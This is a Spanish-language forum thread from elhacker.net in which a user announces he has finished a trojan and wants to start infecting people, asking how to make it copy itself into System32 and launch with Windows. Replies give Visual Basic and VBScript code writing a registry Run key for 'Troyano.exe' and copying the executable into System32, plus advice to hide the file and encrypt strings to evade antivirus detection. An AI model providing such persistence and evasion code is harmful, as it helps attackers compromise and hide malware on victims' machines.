elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  copiar a system o system 32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 Ir Abajo Respuesta Imprimir
Autor Tema: copiar a system o system 32  (Leído 12,212 veces)
vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
copiar a system o system 32
« en: 1 Mayo 2007, 20:15 pm »

bueno... habiendo terminado un troyano... esta vez mas elaborado aunque con muy poquitas funciones... :S queria ya empezar a infectar... pero para eso necesito q cuando se ejecute el server se copie a alguna carpeta donde no lo enceuntren facil... como system o system32 y q se ejecute con windows....

alguno sabe como hacerlo?? desde ya muchas gracias


En línea

Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: copiar a system o system 32
« Respuesta #1 en: 1 Mayo 2007, 20:31 pm »

Vamos,no te vamos a dar todo hecho,algo tan sencillo como añadirse a run y copiarse a system...busca un poco antes de postear.
Ahora no tngo nada de tiempo,siento no poner code,pero esta en el foro.
Saludos.


En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #2 en: 2 Mayo 2007, 00:49 am »

bueno segui buscando y encontre la funcino para hacer q se ejecute con windows... la dejo aqui por si a alguien le hace falta:

usamos:
txtClave
txtExe
LabelInfo

Citar
Private mReg As cQueryReg
Private Const cvRun As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"

Dim s As String
'
s = mReg.GetRegString(cvRun, txtClave.Text)
If s <> "" Then
    LabelInfo.Caption = "La clave ya estaba asignada." & vbCrLf & s
Else
    If mReg.SetReg(cvRun, txtClave.Text, txtExe.Text) = ERROR_NONE Then
        LabelInfo.Caption = "La clave se ha asignado correctamente."
    Else
        LabelInfo.Caption = "ERROR al crear la clave."
    End If
End If

no lo probe al codigo espero q ande... jeje


no encontre como hacer a q se copie a system... me dijeron q era algo con clon pero nada
por favor si alguno seria tan amable de acercarme el codigo o algun link se lo agradeceria mucho  ;)

les dejo el link de donde saque la info
http://www.elguille.info/VB/utilidades/ExeEnCurrentVersionRun.htm
« Última modificación: 2 Mayo 2007, 00:55 am por vivachapas » En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #3 en: 2 Mayo 2007, 00:59 am »

lo tengoooooo XD


http://foro.elhacker.net/index.php/topic,151715.0.html

para aquel q lo quiera ahi ta el link
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #4 en: 2 Mayo 2007, 01:37 am »

Código:
s = mReg.GetRegString(cvRun, txtClave.Text)

no entiendo q tengo q poner en el txtClave??
En línea

Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: copiar a system o system 32
« Respuesta #5 en: 2 Mayo 2007, 18:08 pm »

Código:
dim clave as object    
set clave=CreateObject("WScript.shell")
clave.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "Trojan" ,"c:\windows\system32\" & "Troyano.exe"     
y para copiarse:
Código:
Filecopy APP.apth & "\" & APP.exename & ".exe" ,"C:\WINDOWS\System32\troyano.exe"  
Bueno ahi lo tienes.
Saludos.
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #6 en: 2 Mayo 2007, 19:03 pm »

muchas gracias..! ya lo pruebo  ;)
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #7 en: 2 Mayo 2007, 21:35 pm »

Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory que te va a dar como resutlado:

Citar
<HD>:\<carpeta de Windows>\System32

Otra cosa que puedes hacer es ocultarlo a la vista del usuario, es decir, dejando el archivo como archivo oculto, con el comando SetAttr

Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).

Un Saludo.

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
BenRu
The Prodigy


Desconectado Desconectado

Mensajes: 4.006


Ver Perfil
Re: copiar a system o system 32
« Respuesta #8 en: 2 Mayo 2007, 21:47 pm »

Citar
Es un error bastante comun presuponer que el windows esta instalado en el disco C:\....para asegurarte, utiliza la api GetSystemDirectory

En un modulo:

Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long


Formulario:

Código:
Private Sub Form_Load()
    Dim Car As String * 128
    Dim Longitud, Es As Integer
    Dim Camino As String
    Dim win
    Dim sys
   
    Longitud = 128
   
    Es = GetWindowsDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    win = Camino
   
    Es = GetSystemDirectory(Car, Longitud)
    Camino = RTrim$(LCase$(Left$(Car, Es)))
    sys = Camino
End Sub

Un saludo  ;)
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #9 en: 2 Mayo 2007, 21:55 pm »

Citar
Tambien te recomiendo que si vas a usar VBS para añadirte al registro, encriptes las cadenas para evitar la heuristica de ciertos antivirus (Por ejemplo el Nod32).

me podrias decir como lo cifro las cadenas??


Código:
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

si yo quiero guardarlo solo en system32 necesito esta api solamente... o la otra tb??
En línea

Páginas: [1] 2 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Utilidad proceso SYSTEM
Windows
crazykenny 8 6,334 Último mensaje 27 Abril 2011, 23:10 pm
por Randomize
System.Xml.Linq y System.Core « 1 2 »
.NET (C#, VB.NET, ASP)
SγиtαxEяяoя 10 7,130 Último mensaje 23 Junio 2013, 23:50 pm
por Eleкtro
[PC]System Shock (2020)
Juegos y Consolas
luiti 0 1,617 Último mensaje 26 Septiembre 2020, 17:54 pm
por luiti
System.Net métodos
.NET (C#, VB.NET, ASP)
Beginner Web 0 1,767 Último mensaje 6 Noviembre 2020, 23:33 pm
por Beginner Web
System Informer
Software
B€T€B€ 1 3,470 Último mensaje 13 Marzo 2023, 02:11 am
por ThunderCls
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines